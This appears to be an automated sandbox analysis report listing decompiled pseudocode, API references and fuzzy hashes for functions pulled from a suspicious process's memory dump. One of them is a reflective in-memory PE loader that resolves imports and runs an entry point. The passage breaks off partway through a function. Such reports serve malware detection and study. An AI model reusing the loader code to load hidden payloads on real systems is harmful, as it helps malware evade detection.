Uniqueness Score: -1.00%

Function 0360C4D9, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 117
libraryCOMMON

Download Yara Rule

C-Code - Quality: 89%

			E0360C4D9(void* __ebx, void* __edx, void* __edi, void* __esi) {
				char _v8;
				char _v12;
				void _v140;
				signed char _t14;
				char _t15;
				intOrPtr _t20;
				void* _t25;
				intOrPtr _t26;
				intOrPtr _t32;
				WCHAR* _t34;
				intOrPtr _t35;
				struct HINSTANCE__* _t37;
				int _t38;
				intOrPtr _t46;
				void* _t47;
				intOrPtr _t50;
				void* _t60;
				void* _t61;
				char _t62;
				char* _t63;
				void* _t65;
				intOrPtr _t66;
				char _t68;

				_t65 = __esi;
				_t61 = __edi;
				_t47 = __ebx;
				_t50 =  *0x361e688; // 0x33f0000
				_t14 =  *(_t50 + 0x1898);
				if(_t14 == 0x100 ||  *((intOrPtr*)(_t50 + 4)) >= 0xa && (_t14 & 0x00000004) != 0) {
					_t15 = E036095C7(_t50, 0xb62);
					_t66 =  *0x361e688; // 0x33f0000
					_t62 = _t15;
					_t67 = _t66 + 0xb0;
					_v8 = _t62;
					E03609626( &_v140, 0x40, L"%08x", E0360D40B(_t66 + 0xb0, E0360C384(_t66 + 0xb0), 0));
					_t20 =  *0x361e688; // 0x33f0000
					asm("sbb eax, eax");
					_t25 = E036095C7(_t67, ( ~( *(_t20 + 0xa8)) & 0x00000068) + 0x615);
					_t63 = "\\";
					_t26 =  *0x361e688; // 0x33f0000
					_t68 = E036092CB(_t26 + 0x1020);
					_v12 = _t68;
					E036085BB( &_v8);
					_t32 =  *0x361e688; // 0x33f0000
					_t34 = E036092CB(_t32 + 0x122a);
					 *0x361e784 = _t34;
					_t35 =  *0x361e684; // 0x530f6c8
					 *((intOrPtr*)(_t35 + 0x110))(_t68, _t34, 0, _t63,  &_v140, ".", L"dll", 0, _t63, _t25, _t63, _t62, 0, _t61, _t65, _t47);
					_t37 = LoadLibraryW( *0x361e784);
					 *0x361e77c = _t37;
					if(_t37 == 0) {
						_t38 = 0;
					} else {
						_push(_t37);
						_t60 = 0x28;
						_t38 = E0360E17C(0x361bb40, _t60);
					}
					 *0x361e780 = _t38;
					E03608600( &_v12, 0xfffffffe);
					memset( &_v140, 0, 0x80);
					if( *0x361e780 != 0) {
						goto L10;
					} else {
						E03608600(0x361e784, 0xfffffffe);
						goto L8;
					}
				} else {
					L8:
					if( *0x361e780 == 0) {
						_t46 =  *0x361e6bc; // 0x530f7f0
						 *0x361e780 = _t46;
					}
					L10:
					return 1;
				}
			}

0x0360c4d9
0x0360c4d9
0x0360c4d9
0x0360c4dc
0x0360c4e8
0x0360c4f3
0x0360c50f
0x0360c514
0x0360c51d
0x0360c51f
0x0360c527
0x0360c548
0x0360c54d
0x0360c55a
0x0360c565
0x0360c56c
0x0360c573
0x0360c584
0x0360c58a
0x0360c58d
0x0360c5a4
0x0360c5b0
0x0360c5b8
0x0360c5bf
0x0360c5c5
0x0360c5d1
0x0360c5d7
0x0360c5de
0x0360c5f1
0x0360c5e0
0x0360c5e0
0x0360c5e3
0x0360c5e9
0x0360c5ee
0x0360c5f3
0x0360c5fe
0x0360c610
0x0360c622
0x00000000
0x0360c624
0x0360c62b
0x00000000
0x0360c631
0x0360c632
0x0360c632
0x0360c639
0x0360c63b
0x0360c640
0x0360c640
0x0360c645
0x0360c649
0x0360c649

APIs

LoadLibraryW.KERNEL32 ref: 0360C5D1
memset.MSVCRT ref: 0360C610

Strings

dll, xrefs: 0360C593
%08x, xrefs: 0360C53A

Memory Dump Source

Source File: 00000004.00000002.951544528.0000000003600000.00000040.00020000.sdmp, Offset: 03600000, based on PE: true

Similarity

API ID: LibraryLoadmemset
String ID: %08x$dll
API String ID: 3406617148-2963171978
Opcode ID: 4a3a49dc870853abe098eefe0540b2bdc469dc328233f7aad7d2e13d4775f427
Instruction ID: 0439545dddee126aca06656ae0e43f29bacba62c495c8dfae44af25a05471890
Opcode Fuzzy Hash: 4a3a49dc870853abe098eefe0540b2bdc469dc328233f7aad7d2e13d4775f427
Instruction Fuzzy Hash: 2C31E6B2A10304AFE714EB68EC4AF9B73ACE709314F48452AF404DB1C4DB75D9508758

Uniqueness

Uniqueness Score: -1.00%

Function 03612D80, Relevance: 6.6, APIs: 5, Instructions: 341
COMMON

Download Yara Rule

C-Code - Quality: 99%

			E03612D80(int _a4, signed int _a8) {
				int _v8;
				intOrPtr _v12;
				signed int _v16;
				void* __esi;
				void* _t137;
				signed int _t141;
				intOrPtr* _t142;
				signed int _t145;
				signed int _t146;
				intOrPtr _t151;
				intOrPtr _t161;
				intOrPtr _t162;
				intOrPtr _t167;
				intOrPtr _t170;
				signed int _t172;
				intOrPtr _t173;
				int _t184;
				intOrPtr _t185;
				intOrPtr _t188;
				signed int _t189;
				void* _t195;
				int _t202;
				int _t208;
				intOrPtr _t217;
				signed int _t218;
				int _t219;
				intOrPtr _t220;
				signed int _t221;
				signed int _t222;
				int _t224;
				int _t225;
				signed int _t227;
				intOrPtr _t228;
				int _t232;
				int _t234;
				signed int _t235;
				int _t239;
				void* _t240;
				int _t245;
				int _t252;
				signed int _t253;
				int _t254;
				void* _t257;
				void* _t258;
				int _t259;
				intOrPtr _t260;
				int _t261;
				signed int _t269;
				signed int _t271;
				intOrPtr* _t272;
				void* _t273;

				_t253 = _a8;
				_t272 = _a4;
				_t3 = _t272 + 0xc; // 0x452bf84d
				_t4 = _t272 + 0x2c; // 0x8df075ff
				_t228 =  *_t4;
				_t137 =  *_t3 + 0xfffffffb;
				_t229 =  <=  ? _t137 : _t228;
				_v16 =  <=  ? _t137 : _t228;
				_t269 = 0;
				_a4 =  *((intOrPtr*)( *_t272 + 4));
				asm("o16 nop [eax+eax]");
				while(1) {
					_t8 = _t272 + 0x16bc; // 0x8b3c7e89
					_t141 =  *_t8 + 0x2a >> 3;
					_v12 = 0xffff;
					_t217 =  *((intOrPtr*)( *_t272 + 0x10));
					if(_t217 < _t141) {
						break;
					}
					_t11 = _t272 + 0x6c; // 0xa1ec8b55
					_t12 = _t272 + 0x5c; // 0x5fe85000
					_t245 =  *_t11 -  *_t12;
					_v8 = _t245;
					_t195 =  *((intOrPtr*)( *_t272 + 4)) + _t245;
					_t247 =  <  ? _t195 : _v12;
					_t227 =  <=  ?  <  ? _t195 : _v12 : _t217 - _t141;
					if(_t227 >= _v16) {
						L7:
						if(_t253 != 4) {
							L10:
							_t269 = 0;
							__eflags = 0;
						} else {
							_t285 = _t227 - _t195;
							if(_t227 != _t195) {
								goto L10;
							} else {
								_t269 = _t253 - 3;
							}
						}
						E03615DA0(_t272, _t272, 0, 0, _t269);
						_t18 = _t272 + 0x14; // 0xc703f045
						_t19 = _t272 + 8; // 0x8d000040
						 *( *_t18 +  *_t19 - 4) = _t227;
						_t22 = _t272 + 0x14; // 0xc703f045
						_t23 = _t272 + 8; // 0x8d000040
						 *((char*)( *_t22 +  *_t23 - 3)) = _t227 >> 8;
						_t26 = _t272 + 0x14; // 0xc703f045
						_t27 = _t272 + 8; // 0x8d000040
						 *( *_t26 +  *_t27 - 2) =  !_t227;
						_t30 = _t272 + 0x14; // 0xc703f045
						_t31 = _t272 + 8; // 0x8d000040
						 *((char*)( *_t30 +  *_t31 - 1)) =  !_t227 >> 8;
						E03614B00(_t285,  *_t272);
						_t202 = _v8;
						_t273 = _t273 + 0x14;
						if(_t202 != 0) {
							_t208 =  >  ? _t227 : _t202;
							_v8 = _t208;
							_t36 = _t272 + 0x38; // 0xf47d8bff
							_t37 = _t272 + 0x5c; // 0x5fe85000
							memcpy( *( *_t272 + 0xc),  *_t36 +  *_t37, _t208);
							_t273 = _t273 + 0xc;
							_t252 = _v8;
							 *( *_t272 + 0xc) =  *( *_t272 + 0xc) + _t252;
							 *((intOrPtr*)( *_t272 + 0x10)) =  *((intOrPtr*)( *_t272 + 0x10)) - _t252;
							 *((intOrPtr*)( *_t272 + 0x14)) =  *((intOrPtr*)( *_t272 + 0x14)) + _t252;
							 *(_t272 + 0x5c) =  *(_t272 + 0x5c) + _t252;
							_t227 = _t227 - _t252;
						}
						if(_t227 != 0) {
							E03614C40( *_t272,  *( *_t272 + 0xc), _t227);
							_t273 = _t273 + 0xc;
							 *( *_t272 + 0xc) =  *( *_t272 + 0xc) + _t227;
							 *((intOrPtr*)( *_t272 + 0x10)) =  *((intOrPtr*)( *_t272 + 0x10)) - _t227;
							 *((intOrPtr*)( *_t272 + 0x14)) =  *((intOrPtr*)( *_t272 + 0x14)) + _t227;
						}
						_t253 = _a8;
						if(_t269 == 0) {
							continue;
						}
					} else {
						if(_t227 != 0 || _t253 == 4) {
							if(_t253 != 0 && _t227 == _t195) {
								goto L7;
							}
						}
					}
					break;
				}
				_t142 =  *_t272;
				_t232 = _a4 -  *((intOrPtr*)(_t142 + 4));
				_a4 = _t232;
				if(_t232 == 0) {
					_t83 = _t272 + 0x6c; // 0xa1ec8b55
					_t254 =  *_t83;
				} else {
					_t59 = _t272 + 0x2c; // 0x8df075ff
					_t224 =  *_t59;
					if(_t232 < _t224) {
						_t65 = _t272 + 0x3c; // 0x830cc483
						_t66 = _t272 + 0x6c; // 0xa1ec8b55
						_t260 =  *_t66;
						__eflags =  *_t65 - _t260 - _t232;
						if( *_t65 - _t260 <= _t232) {
							_t67 = _t272 + 0x38; // 0xf47d8bff
							_t261 = _t260 - _t224;
							 *(_t272 + 0x6c) = _t261;
							memcpy( *_t67,  *_t67 + _t224, _t261);
							_t70 = _t272 + 0x16b0; // 0xdf750008
							_t188 =  *_t70;
							_t273 = _t273 + 0xc;
							_t232 = _a4;
							__eflags = _t188 - 2;
							if(_t188 < 2) {
								_t189 = _t188 + 1;
								__eflags = _t189;
								 *(_t272 + 0x16b0) = _t189;
							}
						}
						_t73 = _t272 + 0x38; // 0xf47d8bff
						_t74 = _t272 + 0x6c; // 0xa1ec8b55
						memcpy( *_t73 +  *_t74,  *((intOrPtr*)( *_t272)) - _t232, _t232);
						_t225 = _a4;
						_t273 = _t273 + 0xc;
						_t76 = _t272 + 0x6c;
						 *_t76 =  *(_t272 + 0x6c) + _t225;
						__eflags =  *_t76;
						_t78 = _t272 + 0x6c; // 0xa1ec8b55
						_t184 =  *_t78;
						_t79 = _t272 + 0x2c; // 0x8df075ff
						_t239 =  *_t79;
					} else {
						 *(_t272 + 0x16b0) = 2;
						_t61 = _t272 + 0x38; // 0xf47d8bff
						memcpy( *_t61,  *_t142 - _t224, _t224);
						_t62 = _t272 + 0x2c; // 0x8df075ff
						_t184 =  *_t62;
						_t273 = _t273 + 0xc;
						_t225 = _a4;
						_t239 = _t184;
						 *(_t272 + 0x6c) = _t184;
					}
					_t254 = _t184;
					 *(_t272 + 0x5c) = _t184;
					_t81 = _t272 + 0x16b4; // 0xe9ffcb83
					_t185 =  *_t81;
					_t240 = _t239 - _t185;
					_t241 =  <=  ? _t225 : _t240;
					_t242 = ( <=  ? _t225 : _t240) + _t185;
					 *((intOrPtr*)(_t272 + 0x16b4)) = ( <=  ? _t225 : _t240) + _t185;
				}
				if( *(_t272 + 0x16c0) < _t254) {
					 *(_t272 + 0x16c0) = _t254;
				}
				if(_t269 == 0) {
					_t218 = _a8;
					__eflags = _t218;
					if(_t218 == 0) {
						L34:
						_t89 = _t272 + 0x3c; // 0x830cc483
						_t219 =  *_t272;
						_t145 =  *_t89 - _t254 - 1;
						_a4 =  *_t272;
						_t234 = _t254;
						_v16 = _t145;
						_v8 = _t254;
						__eflags =  *((intOrPtr*)(_t219 + 4)) - _t145;
						if( *((intOrPtr*)(_t219 + 4)) > _t145) {
							_v8 = _t254;
							_t95 = _t272 + 0x5c; // 0x5fe85000
							_a4 = _t219;
							_t234 = _t254;
							_t97 = _t272 + 0x2c; // 0x8df075ff
							__eflags =  *_t95 -  *_t97;
							if( *_t95 >=  *_t97) {
								_t98 = _t272 + 0x2c; // 0x8df075ff
								_t167 =  *_t98;
								_t259 = _t254 - _t167;
								_t99 = _t272 + 0x38; // 0xf47d8bff
								 *(_t272 + 0x5c) =  *(_t272 + 0x5c) - _t167;
								 *(_t272 + 0x6c) = _t259;
								memcpy( *_t99, _t167 +  *_t99, _t259);
								_t103 = _t272 + 0x16b0; // 0xdf750008
								_t170 =  *_t103;
								_t273 = _t273 + 0xc;
								__eflags = _t170 - 2;
								if(_t170 < 2) {
									_t172 = _t170 + 1;
									__eflags = _t172;
									 *(_t272 + 0x16b0) = _t172;
								}
								_t106 = _t272 + 0x2c; // 0x8df075ff
								_t145 = _v16 +  *_t106;
								__eflags = _t145;
								_a4 =  *_t272;
								_t108 = _t272 + 0x6c; // 0xa1ec8b55
								_t234 =  *_t108;
								_v8 = _t234;
							}
						}
						_t255 = _a4;
						_t220 =  *((intOrPtr*)(_a4 + 4));
						__eflags = _t145 - _t220;
						_t221 =  <=  ? _t145 : _t220;
						_t146 = _t221;
						_a4 = _t221;
						_t222 = _a8;
						__eflags = _t146;
						if(_t146 != 0) {
							_t114 = _t272 + 0x38; // 0xf47d8bff
							E03614C40(_t255,  *_t114 + _v8, _t146);
							_t273 = _t273 + 0xc;
							_t117 = _t272 + 0x6c;
							 *_t117 =  *(_t272 + 0x6c) + _a4;
							__eflags =  *_t117;
							_t119 = _t272 + 0x6c; // 0xa1ec8b55
							_t234 =  *_t119;
						}
						__eflags =  *(_t272 + 0x16c0) - _t234;
						if( *(_t272 + 0x16c0) < _t234) {
							 *(_t272 + 0x16c0) = _t234;
						}
						_t122 = _t272 + 0x16bc; // 0x8b3c7e89
						_t123 = _t272 + 0xc; // 0x452bf84d
						_t257 =  *_t123 - ( *_t122 + 0x2a >> 3);
						__eflags = _t257 - 0xffff;
						_t258 =  >  ? 0xffff : _t257;
						_t124 = _t272 + 0x2c; // 0x8df075ff
						_t151 =  *_t124;
						_t125 = _t272 + 0x5c; // 0x5fe85000
						_t235 = _t234 -  *_t125;
						__eflags = _t258 - _t151;
						_t152 =  <=  ? _t258 : _t151;
						__eflags = _t235 - ( <=  ? _t258 : _t151);
						if(_t235 >= ( <=  ? _t258 : _t151)) {
							L49:
							__eflags = _t235 - _t258;
							_t154 =  >  ? _t258 : _t235;
							_a4 =  >  ? _t258 : _t235;
							__eflags = _t222 - 4;
							if(_t222 != 4) {
								L53:
								_t269 = 0;
								__eflags = 0;
							} else {
								_t161 =  *_t272;
								__eflags =  *(_t161 + 4);
								_t154 = _a4;
								if( *(_t161 + 4) != 0) {
									goto L53;
								} else {
									__eflags = _t154 - _t235;
									if(_t154 != _t235) {
										goto L53;
									} else {
										_t269 = _t222 - 3;
									}
								}
							}
							_t131 = _t272 + 0x38; // 0xf47d8bff
							_t132 = _t272 + 0x5c; // 0x5fe85000
							E03615DA0(_t272, _t272,  *_t131 +  *_t132, _t154, _t269);
							_t134 = _t272 + 0x5c;
							 *_t134 =  *(_t272 + 0x5c) + _a4;
							__eflags =  *_t134;
							E03614B00( *_t134,  *_t272);
						} else {
							__eflags = _t235;
							if(_t235 != 0) {
								L46:
								__eflags = _t222;
								if(_t222 != 0) {
									_t162 =  *_t272;
									__eflags =  *(_t162 + 4);
									if( *(_t162 + 4) == 0) {
										__eflags = _t235 - _t258;
										if(_t235 <= _t258) {
											goto L49;
										}
									}
								}
							} else {
								__eflags = _t222 - 4;
								if(_t222 == 4) {
									goto L46;
								}
							}
						}
						asm("sbb edi, edi");
						_t271 =  ~_t269 & 0x00000002;
						__eflags = _t271;
						return _t271;
					} else {
						__eflags = _t218 - 4;
						if(_t218 == 4) {
							goto L34;
						} else {
							_t173 =  *_t272;
							__eflags =  *(_t173 + 4);
							if( *(_t173 + 4) != 0) {
								goto L34;
							} else {
								_t88 = _t272 + 0x5c; // 0x5fe85000
								__eflags = _t254 -  *_t88;
								if(_t254 !=  *_t88) {
									goto L34;
								} else {
									return 1;
								}
							}
						}
					}
				} else {
					return 3;
				}
			}

0x03612d86
0x03612d8b
0x03612d8f
0x03612d92
0x03612d92
0x03612d95
0x03612d9a
0x03612d9f
0x03612da2
0x03612da7
0x03612daa
0x03612db0
0x03612db0
0x03612dbb
0x03612dbe
0x03612dc5
0x03612dca
0x00000000
0x00000000
0x03612dd0
0x03612dd5
0x03612dd5
0x03612dda
0x03612de0
0x03612dea
0x03612def
0x03612df5
0x03612e14
0x03612e17
0x03612e22
0x03612e22
0x03612e22
0x03612e19
0x03612e19
0x03612e1b
0x00000000
0x03612e1d
0x03612e1d
0x03612e1d
0x03612e1b
0x03612e2a
0x03612e2f
0x03612e34
0x03612e3a
0x03612e3e
0x03612e41
0x03612e44
0x03612e4a
0x03612e4f
0x03612e52
0x03612e58
0x03612e5d
0x03612e63
0x03612e69
0x03612e6e
0x03612e71
0x03612e76
0x03612e7a
0x03612e7e
0x03612e81
0x03612e84
0x03612e8d
0x03612e94
0x03612e97
0x03612e9a
0x03612e9f
0x03612ea4
0x03612ea7
0x03612eaa
0x03612eaa
0x03612eae
0x03612eb7
0x03612ebe
0x03612ec1
0x03612ec6
0x03612ecb
0x03612ecb
0x03612ece
0x03612ed3
0x00000000
0x00000000
0x03612df7
0x03612df9
0x03612e06
0x00000000
0x00000000
0x03612e06
0x03612df9
0x00000000
0x03612df5
0x03612ed9
0x03612ede
0x03612ee1
0x03612ee4
0x03612f8f
0x03612f8f
0x03612eea
0x03612eea
0x03612eea
0x03612eef
0x03612f19
0x03612f1c
0x03612f1c
0x03612f21
0x03612f23
0x03612f25
0x03612f28
0x03612f2b
0x03612f33
0x03612f38
0x03612f38
0x03612f3e
0x03612f41
0x03612f44
0x03612f47
0x03612f49
0x03612f49
0x03612f4a
0x03612f4a
0x03612f47
0x03612f58
0x03612f5b
0x03612f5f
0x03612f64
0x03612f67
0x03612f6a
0x03612f6a
0x03612f6a
0x03612f6d
0x03612f6d
0x03612f70
0x03612f70
0x03612ef1
0x03612ef1
0x03612f01
0x03612f04
0x03612f09
0x03612f09
0x03612f0c
0x03612f0f
0x03612f12
0x03612f14
0x03612f14
0x03612f73
0x03612f75
0x03612f78
0x03612f78
0x03612f7e
0x03612f82
0x03612f85
0x03612f87
0x03612f87
0x03612f98
0x03612f9a
0x03612f9a
0x03612fa2
0x03612fb0
0x03612fb3
0x03612fb5
0x03612fd5
0x03612fd5
0x03612fd8
0x03612fde
0x03612fdf
0x03612fe2
0x03612fe4
0x03612fe7
0x03612fea
0x03612fed
0x03612ff1
0x03612ff4
0x03612ff7
0x03612ffa
0x03612ffc
0x03612ffc
0x03612fff
0x03613001
0x03613001
0x03613004
0x03613006
0x03613009
0x03613011
0x03613014
0x03613019
0x03613019
0x0361301f
0x03613022
0x03613025
0x03613027
0x03613027
0x03613028
0x03613028
0x03613033
0x03613033
0x03613033
0x03613036
0x03613039
0x03613039
0x0361303c
0x0361303c
0x03612fff
0x0361303f
0x03613042
0x03613045
0x03613047
0x0361304a
0x0361304c
0x0361304f
0x03613052
0x03613054
0x03613057
0x0361305f
0x03613067
0x0361306a
0x0361306a
0x0361306a
0x0361306d
0x0361306d
0x0361306d
0x03613070
0x03613076
0x03613078
0x03613078
0x0361307e
0x03613084
0x0361308d
0x03613094
0x03613096
0x03613099
0x03613099
0x0361309c
0x0361309c
0x0361309f
0x036130a1
0x036130a4
0x036130a6
0x036130c1
0x036130c1
0x036130c5
0x036130c8
0x036130cb
0x036130ce
0x036130e4
0x036130e4
0x036130e4
0x036130d0
0x036130d0
0x036130d2
0x036130d6
0x036130d9
0x00000000
0x036130db
0x036130db
0x036130dd
0x00000000
0x036130df
0x036130df
0x036130df
0x036130dd
0x036130d9
0x036130e8
0x036130eb
0x036130f0
0x036130fa
0x036130fa
0x036130fa
0x036130fd
0x036130a8
0x036130a8
0x036130aa
0x036130b1
0x036130b1
0x036130b3
0x036130b5
0x036130b7
0x036130bb
0x036130bd
0x036130bf
0x00000000
0x00000000
0x036130bf
0x036130bb
0x036130ac
0x036130ac
0x036130af
0x00000000
0x00000000
0x036130af
0x036130aa
0x03613107
0x03613109
0x03613109
0x03613114
0x03612fb7
0x03612fb7
0x03612fba
0x00000000
0x03612fbc
0x03612fbc
0x03612fbe
0x03612fc2
0x00000000
0x03612fc4
0x03612fc4
0x03612fc4
0x03612fc7
0x00000000
0x03612fcb
0x03612fd4
0x03612fd4
0x03612fc7
0x03612fc2
0x03612fba
0x03612fa6
0x03612faf
0x03612faf

APIs

memcpy.MSVCRT ref: 03612E8D
memcpy.MSVCRT ref: 03612F04
memcpy.MSVCRT ref: 03612F33
memcpy.MSVCRT ref: 03612F5F
memcpy.MSVCRT ref: 03613014

Part of subcall function 03615DA0: memcpy.MSVCRT ref: 03615E7E

Part of subcall function 03614B00: memcpy.MSVCRT ref: 03614B2A

Memory Dump Source

Source File: 00000004.00000002.951544528.0000000003600000.00000040.00020000.sdmp, Offset: 03600000, based on PE: true

Similarity

API ID: memcpy
String ID:
API String ID: 3510742995-0
Opcode ID: 6b99f785ef5bb432ba68396c877eb0d4086885f26b78ddb0bfc44904db9e768b
Instruction ID: 37f92e61c07597de5f8ff42a19195074019c2e6e8804826e0ef386d2b38f2b3c
Opcode Fuzzy Hash: 6b99f785ef5bb432ba68396c877eb0d4086885f26b78ddb0bfc44904db9e768b
Instruction Fuzzy Hash: 6FD11475A007049FCB24CF6DD9D096AB7E5FF88304B28896DE88ACB701D731E954CB54

Uniqueness

Uniqueness Score: -1.00%

Function 03612AF7, Relevance: 6.2, APIs: 4, Instructions: 219
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 52%

			E03612AF7(intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
				signed int _v5;
				signed short _v12;
				intOrPtr* _v16;
				signed int* _v20;
				intOrPtr _v24;
				unsigned int _v28;
				signed short* _v32;
				struct HINSTANCE__* _v36;
				intOrPtr* _v40;
				signed short* _v44;
				intOrPtr _v48;
				unsigned int _v52;
				intOrPtr _v56;
				_Unknown_base(*)()* _v60;
				signed int _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				unsigned int _v76;
				intOrPtr _v80;
				signed int _v84;
				intOrPtr _v88;
				signed int _t149;
				void* _t189;
				signed int _t194;
				signed int _t196;
				intOrPtr _t236;

				_v72 =  *((intOrPtr*)(_a4 + 0x3c)) + _a4;
				_v24 = _v72;
				_t236 = _a4 -  *((intOrPtr*)(_v24 + 0x34));
				_v56 = _t236;
				if(_t236 == 0) {
					L13:
					while(0 != 0) {
					}
					_push(8);
					if( *((intOrPtr*)(_v24 + 0xbadc25)) == 0) {
						L35:
						_v68 =  *((intOrPtr*)(_v24 + 0x28)) + _a4;
						while(0 != 0) {
						}
						if(_a12 != 0) {
							 *_a12 = _v68;
						}
						 *((intOrPtr*)(_v24 + 0x34)) = _a4;
						return _v68(_a4, 1, _a8);
					}
					_v84 = 0x80000000;
					_t149 = 8;
					_v16 = _a4 +  *((intOrPtr*)(_v24 + (_t149 << 0) + 0x78));
					while( *((intOrPtr*)(_v16 + 0xc)) != 0) {
						_v36 = GetModuleHandleA( *((intOrPtr*)(_v16 + 0xc)) + _a4);
						if(_v36 == 0) {
							_v36 = LoadLibraryA( *((intOrPtr*)(_v16 + 0xc)) + _a4);
						}
						if(_v36 != 0) {
							if( *_v16 == 0) {
								_v20 =  *((intOrPtr*)(_v16 + 0x10)) + _a4;
							} else {
								_v20 =  *_v16 + _a4;
							}
							_v64 = _v64 & 0x00000000;
							while( *_v20 != 0) {
								if(( *_v20 & _v84) == 0) {
									_v88 =  *_v20 + _a4;
									_v60 = GetProcAddress(_v36, _v88 + 2);
								} else {
									_v60 = GetProcAddress(_v36,  *_v20 & 0x0000ffff);
								}
								if( *((intOrPtr*)(_v16 + 0x10)) == 0) {
									 *_v20 = _v60;
								} else {
									 *( *((intOrPtr*)(_v16 + 0x10)) + _a4 + _v64) = _v60;
								}
								_v20 =  &(_v20[1]);
								_v64 = _v64 + 4;
							}
							_v16 = _v16 + 0x14;
							continue;
						} else {
							_t189 = 0xfffffffd;
							return _t189;
						}
					}
					goto L35;
				}
				_t194 = 8;
				_v44 = _a4 +  *((intOrPtr*)(_v24 + 0x78 + _t194 * 5));
				_t196 = 8;
				_v48 =  *((intOrPtr*)(_v24 + 0x7c + _t196 * 5));
				while(0 != 0) {
				}
				while(_v48 > 0) {
					_v28 = _v44[2];
					_v48 = _v48 - _v28;
					_v28 = _v28 - 8;
					_v28 = _v28 >> 1;
					_v32 =  &(_v44[4]);
					_v80 = _a4 +  *_v44;
					_v52 = _v28;
					while(1) {
						_v76 = _v52;
						_v52 = _v52 - 1;
						if(_v76 == 0) {
							break;
						}
						_v5 = ( *_v32 & 0x0000ffff) >> 0xc;
						_v12 =  *_v32 & 0xfff;
						_v40 = (_v12 & 0x0000ffff) + _v80;
						if((_v5 & 0x000000ff) != 3) {
							if((_v5 & 0x000000ff) == 0xa) {
								 *_v40 =  *_v40 + _v56;
							}
						} else {
							 *_v40 =  *_v40 + _v56;
						}
						_v32 =  &(_v32[1]);
					}
					_v44 = _v32;
				}
				goto L13;
			}

0x03612b06
0x03612b0c
0x03612b15
0x03612b18
0x03612b1b
0x00000000
0x03612c0c
0x03612c10
0x03612c12
0x03612c20
0x03612d3e
0x03612d47
0x03612d4a
0x03612d4e
0x03612d54
0x03612d5c
0x03612d5c
0x03612d64
0x00000000
0x03612d6f
0x03612c26
0x03612c2f
0x03612c3d
0x03612c40
0x03612c5d
0x03612c64
0x03612c76
0x03612c76
0x03612c7d
0x03612c8d
0x03612ca5
0x03612c8f
0x03612c97
0x03612c97
0x03612ca8
0x03612cac
0x03612cbc
0x03612cdf
0x03612cf1
0x03612cbe
0x03612cd2
0x03612cd2
0x03612cfb
0x03612d17
0x03612cfd
0x03612d0c
0x03612d0c
0x03612d1f
0x03612d28
0x03612d28
0x03612d36
0x00000000
0x03612c7f
0x03612c81
0x00000000
0x03612c81
0x03612c7d
0x00000000
0x03612c40
0x03612b23
0x03612b31
0x03612b36
0x03612b41
0x03612b44
0x03612b48
0x03612b4a
0x03612b5a
0x03612b63
0x03612b6c
0x03612b74
0x03612b7d
0x03612b88
0x03612b8e
0x03612b91
0x03612b94
0x03612b9b
0x03612ba2
0x00000000
0x00000000
0x03612bad
0x03612bbb
0x03612bc6
0x03612bd0
0x03612be8
0x03612bf5
0x03612bf5
0x03612bd2
0x03612bdd
0x03612bdd
0x03612bfc
0x03612bfc
0x03612c04
0x03612c04
0x00000000

APIs

GetModuleHandleA.KERNEL32(?), ref: 03612C57
LoadLibraryA.KERNEL32(?), ref: 03612C70
GetProcAddress.KERNEL32(00000000,890CC483), ref: 03612CCC
GetProcAddress.KERNEL32(00000000,?), ref: 03612CEB

Memory Dump Source

Source File: 00000004.00000002.951544528.0000000003600000.00000040.00020000.sdmp, Offset: 03600000, based on PE: true

Similarity

API ID: AddressProc$HandleLibraryLoadModule
String ID:
API String ID: 384173800-0
Opcode ID: 6a5aed4526f1b5888666eabd8df2894a9ba86a5fb38f31eff76aaafcb97096b0
Instruction ID: c1185644289bb930d7cdb48e571b7be18c812ccdd8d8964b4d09eb2cfd51b76f
Opcode Fuzzy Hash: 6a5aed4526f1b5888666eabd8df2894a9ba86a5fb38f31eff76aaafcb97096b0
Instruction Fuzzy Hash: F7A18B75E00209DFCB54CFA8C991AADBBF0FF09314F188859E915EB350D734AA91CB64

Uniqueness

Uniqueness Score: -1.00%

Function 03601C68, Relevance: 6.1, APIs: 4, Instructions: 106
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E03601C68(signed int __ecx, void* __eflags, void* __fp0) {
				char _v16;
				intOrPtr _v20;
				char _v24;
				char _v28;
				void* _t13;
				intOrPtr _t15;
				signed int _t16;
				intOrPtr _t17;
				signed int _t18;
				char _t20;
				intOrPtr _t22;
				void* _t23;
				void* _t24;
				intOrPtr _t29;
				intOrPtr _t35;
				intOrPtr _t41;
				intOrPtr _t43;
				intOrPtr _t48;
				void* _t51;
				signed int _t61;
				signed int _t64;
				void* _t71;

				_t71 = __fp0;
				_t61 = __ecx;
				_t41 =  *0x361e6dc; // 0x35c
				_t13 = E0360A4A5(_t41, 0);
				while(_t13 < 0) {
					E036097F2( &_v28);
					_t43 =  *0x361e6e0; // 0x0
					_t15 =  *0x361e6e4; // 0x0
					_t41 = _t43 + 0xe10;
					asm("adc eax, ebx");
					__eflags = _t15 - _v24;
					if(__eflags > 0) {
						L9:
						_t16 = 0xfffffffe;
						L13:
						return _t16;
					}
					if(__eflags < 0) {
						L4:
						_t17 =  *0x361e684; // 0x530f6c8
						_t18 =  *((intOrPtr*)(_t17 + 0xc8))( *0x361e6d0, 0);
						__eflags = _t18;
						if(_t18 == 0) {
							break;
						}
						_t35 =  *0x361e684; // 0x530f6c8
						 *((intOrPtr*)(_t35 + 0xb4))(0x3e8);
						_t41 =  *0x361e6dc; // 0x35c
						__eflags = 0;
						_t13 = E0360A4A5(_t41, 0);
						continue;
					}
					__eflags = _t41 - _v28;
					if(_t41 >= _v28) {
						goto L9;
					}
					goto L4;
				}
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t20 =  *0x361e6e8; // 0x530fc78
				_v28 = _t20;
				_t22 = E0360A68F(_t41, _t61,  &_v16);
				_v20 = _t22;
				if(_t22 != 0) {
					_t23 = GetCurrentProcess();
					_t24 = GetCurrentThread();
					DuplicateHandle(GetCurrentProcess(), _t24, _t23, 0x361e6d0, 0, 0, 2);
					E036097F2(0x361e6e0);
					_t64 = E03601A1B( &_v28, E03601226, _t71);
					__eflags = _t64;
					if(_t64 >= 0) {
						_push(0);
						_push( *0x361e760);
						_t51 = 0x27;
						E03609EEC(_t51);
					}
				} else {
					_t64 = _t61 | 0xffffffff;
				}
				_t29 =  *0x361e684; // 0x530f6c8
				 *((intOrPtr*)(_t29 + 0x30))( *0x361e6d0);
